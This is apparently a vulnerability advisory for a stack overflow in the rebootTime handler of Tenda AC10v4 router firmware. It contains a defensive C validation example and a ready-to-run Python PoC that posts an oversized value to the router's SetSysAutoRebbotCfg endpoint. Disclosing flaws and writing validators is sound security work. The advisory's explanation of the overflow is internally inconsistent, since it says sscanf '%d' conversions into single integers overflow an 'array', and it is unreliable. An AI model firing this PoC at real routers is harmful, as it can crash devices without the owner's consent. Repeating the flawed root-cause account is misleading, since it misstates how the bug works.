Overview

Affected version

AC10v4 V16.03.10.13

Vulnerability details

Tenda AC10v4 V16.03.10.13 has a stack overflow vulnerability in the formSetRebootTimer function. The function reads the rebootTime parameter from a POST request into the variable __s1_00.


However, since the user controls the contents of __s1_00, the statement sscanf(param_1,"%d:%d",&local_18,&local_14); leads to a buffer overflow: the user-supplied param_1 can exceed the capacity of the local_14 array, which triggers this vulnerability.

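The root cause described above is that an attacker-controlled string reaches sscanf without any check on its length or shape. The following C code is an added example, not Tenda's firmware code, showing how a handler can validate the rebootTime field ("HH:MM") before it is parsed; the function names parse_reboot_time and reboot_time_minutes are hypothetical, and the sample inputs are constructed (one of them is the value the PoC below sends).

```c
#include <ctype.h>
#include <stdio.h>

/* Added example (not Tenda's code): a strict parser for the rebootTime
 * field, which formSetRebootTimer treats as "HH:MM". Instead of handing the
 * attacker-controlled string to sscanf("%d:%d"), the input is checked for
 * exact length and shape before any number is derived from it.
 * Function names are hypothetical. */

/* Length check bounded at 6 so an oversized input is never walked further. */
static size_t bounded_len(const char *s)
{
    size_t n = 0;
    while (n < 6 && s[n] != '\0')
        n++;
    return n;
}

/* Returns 0 and fills hour/minute on success, -1 on any malformed input. */
int parse_reboot_time(const char *s, int *hour, int *minute)
{
    if (s == NULL || hour == NULL || minute == NULL)
        return -1;
    if (bounded_len(s) != 5)               /* "HH:MM" is exactly 5 bytes */
        return -1;
    if (!isdigit((unsigned char)s[0]) || !isdigit((unsigned char)s[1]) ||
        s[2] != ':' ||
        !isdigit((unsigned char)s[3]) || !isdigit((unsigned char)s[4]))
        return -1;
    int h = (s[0] - '0') * 10 + (s[1] - '0');
    int m = (s[3] - '0') * 10 + (s[4] - '0');
    if (h > 23 || m > 59)                  /* range check after shape check */
        return -1;
    *hour = h;
    *minute = m;
    return 0;
}

/* Convenience wrapper: minutes since midnight, or -1 if the field is rejected. */
int reboot_time_minutes(const char *s)
{
    int h, m;
    if (parse_reboot_time(s, &h, &m) != 0)
        return -1;
    return h * 60 + m;
}

int main(void)
{
    /* Constructed samples; "00:77888" is the value sent by the PoC below. */
    const char *samples[] = {"03:30", "23:59", "00:77888", "24:00", "3:30", "12:5x"};
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-10s -> %d\n", samples[i], reboot_time_minutes(samples[i]));
    return 0;
}
```

The length check runs before any character is interpreted, so an over-long value such as "00:77888" is rejected without ever reaching a numeric conversion, and the range check afterwards keeps a well-formed but nonsensical time like "24:00" out of the reboot schedule.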

PoC

import requests
import urllib.parse

# Target router address and the handler that calls formSetRebootTimer
url = "http://192.168.1.100:80/goform/SetSysAutoRebbotCfg"
# rebootTime is the field parsed by sscanf(param_1, "%d:%d", ...)
data = {'adv_band_5g': '111', 'rebootTime': '00:77888', 'adv_band': 'aed', 'autoRebootEn': '1', 'adv_channel_5g': '0', 'aHv_mode_5g': '00'}

# Build the form body by hand so the parameters are sent exactly as listed
encoded_params = []
for k, v in data.items():
    k_encoded = urllib.parse.quote(k)
    v_encoded = urllib.parse.quote(v)
    encoded_params.append(f"{k_encoded}={v_encoded}")

post_data = "&".join(encoded_params)

response = requests.post(
    url,
    data=post_data,
    timeout=3
)

print("Status Code:", response.status_code)
print("Response Text:", response.text)
